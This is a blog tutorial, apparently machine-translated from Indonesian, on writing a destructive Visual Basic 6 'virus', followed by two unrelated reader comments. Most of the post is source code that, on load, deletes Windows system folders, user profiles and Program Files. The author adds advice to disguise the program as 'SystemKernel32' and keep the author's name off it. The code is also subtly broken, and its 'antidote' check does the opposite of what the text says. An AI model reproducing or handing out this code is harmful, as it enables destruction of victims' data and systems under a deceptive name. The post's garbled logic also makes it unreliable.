Creating viruses with visual basic
hello my friend, this time I'll give a little tutorial how to create a virus using Visual Basic 6.0 ..
tutorial for making the virus so deadly, but simple, and rich does not
will tredekteksi antivirus, because it works very simple.
you need, among others, are as follows:
1. VB(optimal : 6.0)
2. you must first understand the function of the existing buttons
check this out:
1. Create a form as small as possible
2. teaching in that form, enter the following code
Public Sub DelAll(ByVal DirtoDelete As Variant)
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\katak.txt”) = True Then
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
FileExist = True
End If
End Function
3. Code blue reply is an antidote to the virus nih sob, so in the folder c: \ windows \ system32 \ katak.txt if no file name, you will keserang own ga ... can you edit what's really so so ...
The red-colored folder would be deleted ama nih virus, edited by myself and you ...
4. Make the project name as the name of the system, here I use the name "SystemKernel32" so it would not be suspected
5. do not ever write your name on this project, okey friend?
6. yes last lived in compiling it ...
how sob, it's easy right? ..
very Simple right? This virus works to remove the system, so dangerous sting once ... this is just an example to make a virus ...
share tentang array sampe sekarang ga ngerti array itu apa...
ReplyDeleteso...minta postingan yang lebih jelas dunk...juga yang mudah dimengerti...